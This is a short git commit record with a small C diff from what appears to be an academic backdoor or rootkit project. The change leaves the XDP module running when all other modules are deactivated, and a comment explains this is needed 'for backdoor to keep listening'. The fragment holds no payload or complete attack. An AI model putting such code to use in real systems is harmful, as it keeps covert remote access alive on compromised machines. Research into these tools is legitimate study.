Added multiple small changes to client and code, submitting almost finished chapter 5

This commit is contained in:
h3xduck
2022-06-18 10:57:10 -04:00
parent 1b766096bf
commit bfcbfcfaf2
42 changed files with 908 additions and 508 deletions

View File

@@ -123,7 +123,8 @@ int activate_all_modules_config(){
int deactivate_all_modules_config(){
//XDP
module_config.xdp_module.all = OFF;
//This is not deactivated, since it is needed for backdoor to keep listening
//module_config.xdp_module.all = OFF;
//SCHED
module_config.sched_module.all = OFF;